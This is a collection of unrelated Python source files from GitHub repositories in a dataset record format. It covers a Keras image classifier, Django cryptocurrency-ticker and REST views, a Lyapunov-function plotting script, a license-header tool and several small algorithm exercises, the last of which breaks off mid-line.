keras.layers.convolutional import Conv2D\r\n\r\n\r\ndef wypakuj_plik(file):\r\n import pickle\r\n fo=open(file,'rb')\r\n dict=pickle.load(fo,encoding='latin1')\r\n fo.close()\r\n return dict\r\n\r\n\r\ndef przygotuj_dane_przykladow_treningowych():\r\n batch1_data = Batch1['data']\r\n batch2_data = Batch2['data']\r\n batch3_data = Batch3['data']\r\n batch4_data = Batch4['data']\r\n batch5_data = Batch5['data']\r\n dane_przyklady = np.concatenate((batch1_data,\r\n batch2_data,\r\n batch3_data,\r\n batch4_data,\r\n batch5_data))\r\n \r\n dane_przyklady = dane_przyklady.reshape([-1,3,32,32]).transpose([0,2,3,1]) \r\n dane_przyklady = dane_przyklady[0:Liczba_przykladow_treningowych,:,:,:]\r\n return dane_przyklady\r\n\r\n\r\ndef przygotuj_dane_kategorie_przykladow_treningowych():\r\n batch1_labels=Batch1['labels']\r\n batch2_labels=Batch2['labels']\r\n batch3_labels=Batch3['labels']\r\n batch4_labels=Batch4['labels']\r\n batch5_labels=Batch5['labels']\r\n dane_przyklady_kategorie = np.concatenate((batch1_labels,\r\n batch2_labels,\r\n batch3_labels,\r\n batch4_labels,\r\n batch5_labels))\r\n dane_przyklady_kategorie = dane_przyklady_kategorie[0:Liczba_przykladow_treningowych]\r\n \r\n return dane_przyklady_kategorie\r\n\r\n\r\ndef przygotuj_dane_przykladow_testowych():\r\n dane_przyklady_testowe = Batch_test['data'] \r\n dane_przyklady_testowe = dane_przyklady_testowe.reshape([-1,3,32,32]).transpose([0,2,3,1])\r\n \r\n dane_przyklady_testowe = 
dane_przyklady_testowe[0:Liczba_przykladow_testowych,:,:,:]\r\n \r\n return dane_przyklady_testowe\r\n \r\n \r\ndef przygotuj_dane_kategorii_przykladow_testowych():\r\n y_test = np.asarray(Batch_test['labels'])\r\n return y_test[0:Liczba_przykladow_testowych]\r\n\r\n\r\ndef dodaj_warstwy_do_sieci_wariant1():\r\n model_sieci = Sequential()\r\n model_sieci.add(Conv2D(64, kernel_size=(3, 3), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(MaxPooling2D(pool_size = (2,2)))\r\n model_sieci.add(Flatten())\r\n model_sieci.add(Dense(1024, activation='relu'))\r\n model_sieci.add(Dense(10, activation='softmax'))\r\n return model_sieci\r\n\r\ndef dodaj_warstwy_do_sieci_wariant2():\r\n model_sieci = Sequential()\r\n model_sieci.add(Conv2D(32, kernel_size=(2, 2), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(Conv2D(32, kernel_size=(5, 5), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(MaxPooling2D(pool_size = (2,2)))\r\n model_sieci.add(Flatten())\r\n model_sieci.add(Dropout(0.25))\r\n model_sieci.add(Dense(1024, activation='relu'))\r\n model_sieci.add(Dense(10, activation='softmax'))\r\n return model_sieci\r\n\r\ndef dodaj_warstwy_do_sieci_wariant3():\r\n model_sieci = Sequential()\r\n model_sieci.add(Conv2D(32, kernel_size=(2, 2), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(Conv2D(32, kernel_size=(1, 1), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(Conv2D(32, kernel_size=(5, 5), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(MaxPooling2D(pool_size = (2,2)))\r\n model_sieci.add(Flatten())\r\n model_sieci.add(Dense(1024, activation='relu'))\r\n model_sieci.add(Dropout(0.25))\r\n model_sieci.add(Dense(612, activation='relu'))\r\n model_sieci.add(Dense(10, activation='softmax'))\r\n return model_sieci\r\n\r\ndef pokaz_wykres_dla_skutecznosci():\r\n plt.plot(Historia_treningu.history['acc'])\r\n plt.plot(Historia_treningu.history['val_acc'])\r\n plt.title('skutecznosc modelu')\r\n plt.ylabel('dokladnosc')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n plt.show()\r\n \r\n \r\ndef pokaz_wykres_dla_bledow():\r\n plt.plot(Historia_treningu.history['loss'])\r\n plt.plot(Historia_treningu.history['val_loss'])\r\n plt.title('bledy modelu')\r\n plt.ylabel('blad')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n plt.show()\r\n \r\n \r\nLiczba_przykladow_treningowych = 5000;\r\nLiczba_przykladow_testowych = 1000;\r\nRozmiar_batch = 100;\r\nLiczba_epok = 50;\r\n \r\nBatch1=wypakuj_plik('dataset/data_batch_1')\r\nBatch2=wypakuj_plik('dataset/data_batch_2')\r\nBatch3=wypakuj_plik('dataset/data_batch_3')\r\nBatch4=wypakuj_plik('dataset/data_batch_4')\r\nBatch5=wypakuj_plik('dataset/data_batch_5')\r\nBatch_test = wypakuj_plik('dataset/test_batch')\r\n\r\nPrzyklady_treningowe = przygotuj_dane_przykladow_treningowych()\r\nKategorie_treningowe = przygotuj_dane_kategorie_przykladow_treningowych()\r\nPrzyklady_testowe = przygotuj_dane_przykladow_testowych()\r\nKategorie_testowe = przygotuj_dane_kategorii_przykladow_testowych()\r\n\r\n\r\nModel_sieci = dodaj_warstwy_do_sieci_wariant2()\r\n\r\nModel_sieci.compile(loss='categorical_crossentropy', optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\nHistoria_treningu = Model_sieci.model.fit(Przyklady_treningowe / 255.0, to_categorical(Kategorie_treningowe),\r\n batch_size=Rozmiar_batch,\r\n epochs=Liczba_epok,\r\n validation_data=(Przyklady_testowe / 255.0, 
to_categorical(Kategorie_testowe)))\r\n\r\npokaz_wykres_dla_skutecznosci()\r\npokaz_wykres_dla_bledow()\r\n\r\n\r\n\r\n \r\n\r\n ","repo_name":"mehow1/licencjat","sub_path":"projekt.py","file_name":"projekt.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"13686273939","text":"from django.shortcuts import render\nfrom django.views import generic\nfrom django.views.generic import TemplateView\nimport requests\nimport json\nimport datetime\n\nclass IndexTemplateView(TemplateView):\n template_name = 'index.html'\n coinList = []\n\n def coinView(parameter_list):\n URL = 'https://coincheck.com/api/ticker'\n coincheck = requests.get(URL).json()\n for key, item in coincheck.items():\n data = (\"%-9s : %-10.9s \" % (key, item))\n coinList.append(data)\n\n # coins = {'BTC': 'btc_jpy', 'ETH': 'eth_jpy',\n # 'XEM': 'xem_jpy', 'BCH': 'bch_jpy'}\n\n # URL = 'https://coincheck.com/api/rate/'\n\n # for key, item in coins.items():\n # coincheck = requests.get(URL+item).json()\n # print(\"%-4s : %-10s\" % (key, coincheck['rate']))\n # pass\n\n\ndef coinfunc(request):\n URL = 'https://coincheck.com/api/ticker'\n coincheck = requests.get(URL).json()\n coinList = []\n\n\n #coincheck\n for key, item in coincheck.items():\n data = (\"%-9s : %-10.9s \" % (key, item))\n coinList.append(data)\n\n #zaif\n URL = 'https://api.zaif.jp/api/1/ticker/btc_jpy'\n zaif = requests.get(URL).json()\n zaifList = []\n #coincheck\n for key, item in zaif.items():\n data = (\"%-9s : %-10.9s \" % (key, item))\n zaifList.append(data)\n\n #context\n context = {\n 'coinList': coinList,\n 'zaif': zaifList,\n }\n\n\n #return\n return render(request, 'index.html', context)\n\n\n","repo_name":"ShotaHirabayashi/cointrade","sub_path":"coinchart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41508349447","text":"n=int(input())\ncheck=False\nl=input().split()\nfor i in range(0,len(l)-1):\n if int(l[i]) * int(l[i+1]) >0:\n check=True\n\n\nif check==True:\n print(\"YES\")\nelse:\n print(\"NO\") ","repo_name":"kanatturarbek/Webb","sub_path":"Lab7/informatics/Part4/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72121224689","text":"from rest_framework.views import APIView\r\nfrom rest_framework import status\r\nfrom rest_framework.response import Response\r\nfrom django.shortcuts import get_object_or_404\r\n\r\nfrom .models import (\r\n AgilePrinciples,\r\n AgileValues,\r\n)\r\nfrom .serializers import (\r\n AgileValueSerializer,\r\n AgilePrincipleSerializer,\r\n)\r\n\r\n# Create your views here.\r\n\r\nclass AgileValuesViewset(APIView):\r\n serializer_class = AgileValueSerializer\r\n # Retreived all data from database\r\n def get(self,request):\r\n agile_values = AgileValues.objects.all()\r\n serializer = AgileValueSerializer(agile_values,many=True)\r\n\r\n return Response(serializer.data, status=status.HTTP_200_OK)\r\n # Create new instance in database\r\n def post(self,request):\r\n data = request.data\r\n serializer = AgileValueSerializer(data=data)\r\n serializer.is_valid(raise_exception=True)\r\n self.perform_create(serializer)\r\n\r\n return Response(serializer.validated_data, status=status.HTTP_201_CREATED)\r\n \r\n def perform_create(self,serializer):\r\n return 
serializer.save()\r\n\r\n\r\n\r\nclass AgilePrincipleViewset(APIView):\r\n serializer_class = AgilePrincipleSerializer\r\n # Retreived data from database\r\n def get(self,request):\r\n agile_principles = AgilePrinciples.objects.all()\r\n serializer = AgilePrincipleSerializer(agile_principles,many=True)\r\n\r\n return Response(serializer.data, status=status.HTTP_200_OK)\r\n # create instance on the database\r\n def post(self,request):\r\n data = request.data\r\n serializer = AgilePrincipleSerializer(data=data)\r\n serializer.is_valid(raise_exception=True)\r\n self.perform_create(serializer)\r\n\r\n return Response(serializer.validated_data, status=status.HTTP_201_CREATED)\r\n \r\n def perform_create(self,serializer):\r\n return serializer.save()\r\n \r\n","repo_name":"fragnatic62/AgileApi","sub_path":"context_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"40135914047","text":"#!python\n\nimport argparse\nimport os.path\nimport json\nimport hexflower.parser as Parser\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n\n parser.add_argument(\"-c\", \"--config\", required=True, type=str,\n help=\"Path to the hex-flower configuration JSON file\")\n parser.add_argument(\"-s\", \"--steps\", required=True, type=int,\n help=\"Number of navigation steps to take in the hex-flower\")\n parser.add_argument(\"-i\", \"--start\", required=False, type=int,\n help=\"Override the starting hex number from the configuration file\")\n\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n\n if args.steps <= 0:\n raise ValueError(\"The number of steps to take must be positive\")\n if not os.path.isfile(args.config):\n raise FileNotFoundError(\n f\"The config file '{args.config}' cannot be found\")\n\n with (open(args.config)) as config_data:\n json_config = json.load(config_data)\n flower_config = Parser.parse_config(json_config)\n current_hex = flower_config.get_starting_hex()\n print(current_hex)\n\n for i in range(0, args.steps):\n current_hex = flower_config.navigate(current_hex)\n print(current_hex)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"freohr/hexflower-roller","sub_path":"hexflower.py","file_name":"hexflower.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31603107527","text":"import RPi.GPIO as GPIO\nimport time\nfrom math import *\nfrom random import *\n\noff = True\nwhile True:\n\tlevel = int(input(\"Input: \"))\n\n\tif level > 1 or level < 0:\n\t\tbreak\n\tif level == 1 and off:\n\t\toff = False\n\t\tGPIO.setmode(GPIO.BOARD)\n\t\tGPIO.setup(23, GPIO.OUT)\n\t\tGPIO.output(23, 0)\n\telif level == 0 and not off:\n\t\toff = True\n\t\tGPIO.cleanup()\nGPIO.cleanup()\n","repo_name":"VladBargin/CompLocker","sub_path":"scripts/old_scripts/relu.py","file_name":"relu.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"34010662909","text":"'''\n\nDump candidate information in the approved SMP-ZZ sync format.\n\nIt's often useful to get a list of run:lumi:evt only, with something like\n\n$ cut -d ':' -f -3\n\nThe events are sorted by run, then lumi, then event, the same as processing\nthe same-but-unsorted output with the Unix command\n\n$ sort -t : -k 1n -k 2n -k 3n\n\nAuthor: N. Woods, U. 
Wisconsin\n\n'''\n\nimport logging\nfrom rootpy import log as rlog; rlog = rlog['/smpSync']\nlogging.basicConfig(level=logging.WARNING)\nrlog[\"/ROOT.TUnixSystem.SetDisplay\"].setLevel(rlog.ERROR)\nrlog[\"/rootpy.tree.chain\"].setLevel(rlog.WARNING)\n\nfrom ZZAnalyzer.utils.helpers import evVar, objVar, nObjVar, parseChannels, zMassDist\n\nfrom rootpy import asrootpy\nfrom rootpy.io import root_open\nfrom rootpy.tree import TreeChain\nimport argparse\nfrom glob import glob\nfrom os import environ\nfrom os.path import join\n\n\ndef getObjects(channel):\n nObj = {}\n for letter in channel:\n if letter not in nObj:\n nObj[letter] = 1\n else:\n nObj[letter] += 1\n out = []\n for letter in nObj:\n if nObj[letter] == 1:\n out.append(letter)\n else:\n out += [letter+str(n+1) for n in range(nObj[letter])]\n return sorted(out)\n\n\ndef getEventInfo(row, *args):\n return {\n 'run' : evVar(row, 'run'),\n 'event' : evVar(row, 'evt'),\n 'lumi' : evVar(row, 'lumi'),\n }\n\n\ndef getCandInfo(row, hPUWt, *objects):\n numbers = {}\n numbers['run'] = row.run\n numbers['lumi'] = row.lumi\n numbers['event'] = row.evt\n numbers['m4l'] = evVar(row, 'Mass')\n numbers['mZ1'] = nObjVar(row, 'Mass', objects[0], objects[1])\n numbers['mZ2'] = nObjVar(row, 'Mass', objects[2], objects[3])\n\n # eemm channel may have masses swapped\n if zMassDist(numbers['mZ1']) > zMassDist(numbers['mZ2']):\n temp = numbers['mZ2']\n numbers['mZ2'] = numbers['mZ1']\n numbers['mZ1'] = temp\n\n jetPts = evVar(row, 'jetPt')\n numbers['nJets'] = jetPts.size()\n if jetPts.size():\n numbers['jet1pt'] = jetPts.at(0)\n if jetPts.size() > 1:\n numbers['jet2pt'] = jetPts.at(1)\n else:\n numbers['jet2pt'] = -1.\n else:\n numbers['jet1pt'] = -1.\n numbers['jet2pt'] = -1.\n\n numbers['puWt'] = hPUWt.GetBinContent(hPUWt.FindBin(evVar(row, 'nTruePU')))\n recoSF = 1.\n selSF = 1.\n for ob in objects:\n if ob[0] == 'm':\n selSF *= objVar(row, 'EffScaleFactor', ob)\n else:\n recoSF *= objVar(row, 'TrkRecoEffScaleFactor', ob)\n selSF *= objVar(row, 'IDIsoEffScaleFactor', ob)\n\n numbers['recoSF'] = recoSF\n numbers['selSF'] = selSF\n\n numbers['nPU'] = evVar(row, 'nTruePU')\n\n numbers['mjj'] = max(-1.,evVar(row, 'mjj'))\n\n return numbers\n\n\ndef getGenCandInfo(row, hPUWt, *objects):\n numbers = {}\n numbers['mZ1'] = nObjVar(row, 'Mass', objects[0], objects[1])\n if numbers['mZ1'] < 60.:\n return None\n numbers['mZ2'] = nObjVar(row, 'Mass', objects[2], objects[3])\n if numbers['mZ2'] < 60.:\n return None\n\n # eemm channel may have masses swapped\n if zMassDist(numbers['mZ1']) > zMassDist(numbers['mZ2']):\n temp = numbers['mZ2']\n numbers['mZ2'] = numbers['mZ1']\n numbers['mZ1'] = temp\n\n numbers['run'] = row.run\n numbers['lumi'] = row.lumi\n numbers['event'] = row.evt\n numbers['m4l'] = evVar(row, 'Mass')\n\n jetPts = evVar(row, 'jetPt')\n numbers['nJets'] = jetPts.size()\n if jetPts.size():\n numbers['jet1pt'] = jetPts.at(0)\n if jetPts.size() > 1:\n numbers['jet2pt'] = jetPts.at(1)\n else:\n numbers['jet2pt'] = -1.\n else:\n numbers['jet1pt'] = -1.\n numbers['jet2pt'] = -1.\n\n numbers['mjj'] = max(-1.,evVar(row, 'mjj'))\n\n return numbers\n\n\ndef getCandInfo3l(row, hPUWt, *objects):\n numbers = {}\n numbers['run'] = row.run\n numbers['lumi'] = row.lumi\n numbers['event'] = row.evt\n numbers['m3l'] = evVar(row, 'Mass')\n numbers['mZ'] = nObjVar(row, 'Mass', objects[0], objects[1])\n numbers['ptL3'] = objVar(row, 'Pt', objects[2])\n numbers['l3Tight'] = 1 if objVar(row, 'ZZTightID', objects[2]) and objVar(row, 'ZZIsoPass', objects[2]) else 0\n\n 
return numbers\n\n\ndef getAllInfo(channel, ntuple, fInfo, hPUWt):\n found = set()\n objects = getObjects(channel)\n if channel == 'emm':\n objects = objects[1:]+objects[:1]\n\n for row in ntuple:\n numbers = fInfo(row, hPUWt, *objects)\n if numbers is None:\n continue\n evtID = (numbers['run'],numbers['lumi'],numbers['event'])\n if evtID in found:\n continue\n found.add(evtID)\n yield numbers\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dump information about the 4l candidates in an ntuple to a text file, for synchronization.')\n parser.add_argument('input', type=str, nargs=1, help='Input root file or glob to several')\n parser.add_argument('output', type=str, nargs='?', default='candSync.txt',\n help='Name of the text file to output.')\n parser.add_argument('channels', nargs='?', type=str, default='zz',\n help='Comma separated (no spaces) list of channels, or keyword indicated multiple channels')\n parser.add_argument('--listOnly', action='store_true',\n help='Print only run:lumi:event with no further info')\n parser.add_argument('--zPlusL', '--zPlusl', action='store_true',\n help='Use the Z+l control region format instead of the 4l format')\n parser.add_argument('--doGen', action='store_true',\n help='Also make a file for the gen-level information')\n parser.add_argument('--puWeightFile', nargs='?', type=str,\n default='puWeight_69200_24jan2017.root',\n help='Name of pileup weight file, possibly relative to $zza/ZZAnalyzer/data/pileupReweighting/')\n\n\n args = parser.parse_args()\n\n with root_open(join(environ['zza'], 'ZZAnalyzer', 'data',\n 'pileupReweighting', args.puWeightFile)) as fPU:\n hPUWt = asrootpy(fPU.puScaleFactor)\n hPUWt.SetDirectory(0)\n\n if args.zPlusL and args.channels == 'zz':\n args.channels = 'zl'\n channels = parseChannels(args.channels)\n\n inFiles = glob(args.input[0])\n\n outStrings = []\n outStringsGen = []\n\n if args.listOnly:\n outTemp = '{run}:{lumi}:{event}:{channel}\\n'\n infoGetter = getEventInfo\n elif args.zPlusL:\n outTemp = ('{run}:{lumi}:{event}:{channel}:{m3l:.2f}:{mZ:.2f}:{ptL3:.2f}:'\n '{l3Tight}\\n')\n infoGetter = getCandInfo3l\n args.doGen = False\n\n else:\n outTemp = ('{run}:{lumi}:{event}:{channel}:{m4l:.2f}:{mZ1:.2f}:{mZ2:.2f}:'\n '{nJets}:{jet1pt:.2f}:{jet2pt:.2f}:{mjj:.2f}:{puWt:.4f}:{recoSF:.4f}:{selSF:.4f}:{nPU:.2f}\\n')\n infoGetter = getCandInfo\n\n outTempGen = ('{run}:{lumi}:{event}:{channel}:{m4l:.2f}:{mZ1:.2f}:{mZ2:.2f}:'\n '{nJets}:{jet1pt:.2f}:{jet2pt:.2f}:{mjj:.2f}\\n')\n\n for channel in channels:\n if channel == 'emm':\n channelForStr = 'mme' # for sync with Torino\n else:\n channelForStr = channel\n\n if len(inFiles) == 1:\n with root_open(inFiles[0]) as fin:\n n = fin.Get(channel+'/ntuple')\n for numbers in getAllInfo(channel, n, infoGetter, hPUWt):\n outStrings.append(outTemp.format(channel=channelForStr,\n **numbers))\n if args.doGen:\n n = fin.Get(channel+'Gen/ntuple')\n for numbers in getAllInfo(channel, n, getGenCandInfo, hPUWt):\n outStringsGen.append(outTempGen.format(channel=channelForStr,\n **numbers))\n\n else:\n n = TreeChain(channel+'/ntuple', inFiles)\n for numbers in getAllInfo(channel, n, infoGetter, hPUWt):\n outStrings.append(outTemp.format(channel=channelForStr,\n **numbers))\n if args.doGen:\n n = TreeChain(channel+'Gen/ntuple', inFiles)\n for numbers in getAllInfo(channel, n, getGenCandInfo, hPUWt):\n outStringsGen.append(outTempGen.format(channel=channelForStr,\n **numbers))\n\n with open(args.output, 'w') as fout:\n for s in sorted(outStrings, key=lambda x: [int(y) 
for y in x.split(':')[:3]]):\n fout.write(s)\n\n if args.doGen:\n if '.' in args.output:\n outputGen = 'Gen.'.join(args.output.rsplit('.',1))\n else:\n outputGen = args.output+'Gen'\n\n with open(outputGen, 'w') as fout:\n for s in sorted(outStringsGen, key=lambda x: [int(y) for y in x.split(':')[:3]]):\n fout.write(s)\n\n","repo_name":"nwoods/ZZAnalyzer","sub_path":"ZZAnalyzer/utils/scripts/smpSync.py","file_name":"smpSync.py","file_ext":"py","file_size_in_byte":9043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26099693192","text":"#!/usr/bin/env python3\n\nimport argparse\nimport requests\nfrom bioschemas_indexer import indexer\n\n\n# MAIN\nparser = argparse.ArgumentParser('Run a test query against the Solr instance')\nparser.add_argument('query')\nargs = parser.parse_args()\n\n_, solr = indexer.read_conf()\nsolrQueryPath = 'http://' + solr['SOLR_SERVER'] + ':' + \\\n solr['SOLR_PORT'] + '/solr/' + solr['SOLR_CORE'] + '/select'\n\nparams = {'q': args.query, 'defType': 'edismax'}\n\nr = requests.get(solrQueryPath, params=params)\nprint(r.url)\nprint(r.text)\n","repo_name":"buzzbangorg/bsbang-indexer","sub_path":"bsbang-query.py","file_name":"bsbang-query.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23999107074","text":"import numpy as np\nimport torch\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom neural_clf.controllers.clf_qp_net import CLF_QP_Net\nfrom models.pvtol import (\n control_affine_dynamics,\n u_nominal,\n n_controls,\n n_dims,\n low_m,\n high_m,\n low_I,\n high_I,\n)\n\n\n# Beautify plots\nsns.set_theme(context=\"talk\", style=\"white\")\n\n# Load the model from file\nfilename = \"logs/pvtol_robust_clf_qp.pth.tar\"\ncheckpoint = torch.load(filename)\nscenarios = [\n {\"m\": low_m, \"inertia\": low_I},\n # {\"m\": low_m, \"inertia\": low_I},\n # {\"m\": low_m, \"inertia\": low_I},\n # {\"m\": low_m, \"inertia\": low_I},\n]\nnominal_scenario = scenarios[0]\nclf_net = CLF_QP_Net(n_dims,\n checkpoint['n_hidden'],\n n_controls,\n checkpoint['clf_lambda'],\n checkpoint['relaxation_penalty'],\n control_affine_dynamics,\n u_nominal,\n scenarios,\n nominal_scenario)\nclf_net.load_state_dict(checkpoint['clf_net'])\n\nwith torch.no_grad():\n n_grid = 100\n x = torch.linspace(-4, 4, n_grid)\n z = torch.linspace(-4, 4, n_grid)\n grid_x, grid_z = torch.meshgrid(x, z)\n residuals = torch.zeros(n_grid, n_grid)\n V_values = torch.zeros(n_grid, n_grid)\n V_dot_values = torch.zeros(n_grid, n_grid)\n print(\"Plotting V on grid...\")\n for i in tqdm(range(n_grid)):\n for j in range(n_grid):\n # Get the residual from running the model\n q = torch.zeros(1, n_dims)\n # q = torch.tensor([[0.0129, -0.1149, -0.0083, 0.0534, -2.0552, 0.0201]])\n q[0, 0] = x[i]\n q[0, 1] = z[j]\n _, r, V, V_dot = clf_net(q)\n residuals[j, i] = r\n V_values[j, i] = V\n V_dot_values[j, i] = V_dot\n\n fig, axs = plt.subplots(1, 2)\n fig.set_size_inches(17, 8)\n contours = axs[0].contourf(x, z, V_values, cmap=\"magma\", levels=20)\n plt.colorbar(contours, ax=axs[0], orientation=\"horizontal\")\n contours = axs[0].contour(x, z, V_values, colors=[\"blue\"], levels=[checkpoint[\"safe_level\"]])\n axs[0].plot([x.min(), x.max()], [checkpoint[\"safe_z\"], checkpoint[\"safe_z\"]],\n c=\"g\", label=\"Safe\")\n axs[0].plot([x.min(), x.max()], [checkpoint[\"unsafe_z\"], checkpoint[\"unsafe_z\"]],\n c=\"r\", 
label=\"Unsafe\")\n safe_circle = plt.Circle((0.0, 0.0), 3.0, color='g', fill=False)\n unsafe_circle = plt.Circle((0.0, 0.0), 3.5, color='r', fill=False)\n axs[0].add_patch(safe_circle)\n axs[0].add_patch(unsafe_circle)\n axs[0].set_xlabel('$x$')\n axs[0].set_ylabel('$z$')\n axs[0].set_title('$V$')\n axs[0].legend()\n\n contours = axs[1].contourf(x, z, V_dot_values, cmap=\"magma\", levels=20)\n plt.colorbar(contours, ax=axs[1], orientation=\"horizontal\")\n axs[1].set_xlabel('$x$')\n axs[1].set_ylabel('$z$')\n axs[1].set_title('$dV/dt$')\n\n # plt.savefig(\"logs/plots/pvtol/lyap_contour.png\")\n plt.show()\n","repo_name":"dawsonc/neural_clbf_experiments","sub_path":"neural_clf/plotting/pvtol_robust_clf_qp_V.py","file_name":"pvtol_robust_clf_qp_V.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"6610277358","text":"import os\nimport sys\n\nif len(sys.argv) != 2:\n print (\"Usage: python liccopy.py dirname\")\n quit()\n\nindir = sys.argv[1]\n \ncstmt = \"# Copyright 2020 by B. Knueven, D. Mildebrath, C. Muir, J-P Watson, and D.L. Woodruff\"\nlic = \"# This software is distributed under the 3-clause BSD License.\"\n\npyomoscent = \"# Pyomo: Python Optimization Modeling Objects\"\n\n\ndef _get_file(filepath):\n cline = -1\n licline = -1\n pyomofile = False\n with open(filepath,'r') as f:\n lines = f.readlines()\n for lno, line in enumerate(lines):\n if cstmt in line:\n cline = lno\n print\n if lic in line:\n licline = lno\n if pyomoscent in line:\n pyomofile = True\n return lines, cline, licline, pyomofile\n\n\ndef _write_file(filepath, lines, cline, licline, pyomofile):\n print (filepath, end='')\n\n if pyomofile:\n print(\": seems to have Pyomo header; skipping\")\n return\n \n cbefore = -1 # if only adding copyright\n licbefore = -1 # if only adding license\n if cline == -1 and licline != -1:\n cbefore = licline\n if cline != -1 and licline == -1:\n licbefore = licline + 1\n if cline != -1 and licline != -1:\n print(\" .\")\n return\n \n with open(filepath, \"w\") as f:\n if cline == -1 and licline == -1:\n f.write(cstmt+'\\n')\n f.write(lic+'\\n')\n print(\": add both\")\n for lno, line in enumerate(lines):\n if cbefore == lno:\n f.write(cstmt+'\\n')\n print(\": add copyright\")\n if licbefore == lno:\n f.write(lic+'\\n')\n print(\": add license\")\n f.write(line)\n\n\nfor subdir, dirs, files in os.walk(indir):\n for filename in files:\n filepath = subdir + os.sep + filename\n\n if filepath.endswith(\".py\"):\n lines, cline, licline, pyomofile = _get_file(filepath)\n _write_file(filepath, lines, cline, licline, pyomofile)\n \n","repo_name":"Pyomo/mpi-sppy","sub_path":"mpisppy/utils/liccopy.py","file_name":"liccopy.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"20"} +{"seq_id":"6732338708","text":"import math\n\ninput = open('../data/p6_data.txt', 'r')\n\nraw_input = input.read()\ngroups = raw_input.split('\\n\\n')\n\nsum = 0\nfor group in groups:\n people = group.split('\\n')\n if len(people) == 1:\n sum += len(people[0])\n else:\n common_ans = set(people[0])\n for person in people[1:]:\n common_ans = common_ans.intersection(person)\n sum += 
len(common_ans)\n\nprint(sum)","repo_name":"mboylevt/adventofcode","sub_path":"2020/problems/p6_2.py","file_name":"p6_2.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"40287866858","text":"from functools import lru_cache\nclass Solution:\n\tdef minDistance(self, word1: str, word2: str) -> int:\n\t\tn, m = len(word1), len(word2)\n\t\tdp = [[float('inf')] * (m + 1) for _ in range(n + 1)]\n\t\tdp[0] = [i for i in range(m + 1)]\n\t\t\n\t\tfor i in range(1, n + 1):\n\t\t\tfor j in range(m + 1):\n\t\t\t\tif j == 0:\n\t\t\t\t\tdp[i][j] = i\n\t\t\t\t\tcontinue\n\t\t\t\tdp[i][j] = 1 + min(dp[i - 1][j - 1], dp[i][j - 1], dp[i - 1][j])\n\t\t\t\tif word1[i - 1] == word2[j - 1]:\n\t\t\t\t\tdp[i][j] = min(dp[i][j], dp[i - 1][j - 1])\n\t\tprint(dp)\n\t\treturn dp[-1][-1]\n\t\na = Solution()\nword1 = \"horse\"; word2 = \"ros\"\t\n#word1 = \"b\"; word2 = \"abc\"\n#word1 = \"intention\"; word2 = \"execution\"\nprint(a.minDistance(word1, word2))\t\t\t\n\t\t\t\n\n\n","repo_name":"Mvitimin/Python_algorithms","sub_path":"DynamicProgramming/edit-distance_1.py","file_name":"edit-distance_1.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37155673808","text":"# Given an m x n grid of characters board and a string word, return true if word exists in the grid.\n\n# The word can be constructed from letters of sequentially adjacent cells, where adjacent cells are horizontally or vertically neighboring. The same letter cell may not be used more than once.\n\n\n# Example 1:\n\n# Input: board = [[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]], word = \"ABCCED\"\n# Output: true\n\n\n# Example 2:\n\n# Input: board = [[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]], word = \"SEE\"\n# Output: true\n\n# Example 3:\n\n# Input: board = [[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]], word = \"ABCB\"\n# Output: false\n \n\n# Constraints:\n\n# m == board.length\n# n = board[i].length\n# 1 <= m, n <= 6\n# 1 <= word.length <= 15\n# board and word consists of only lowercase and uppercase English letters.\n \n\nclass Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n ROWS = len(board)\n COLS = len(board[0])\n cache = set()\n\n def dfs(i,j, x):\n if x == len(word):\n return True\n if (i < 0 or j < 0 or \n i >= ROWS or j >= COLS or\n 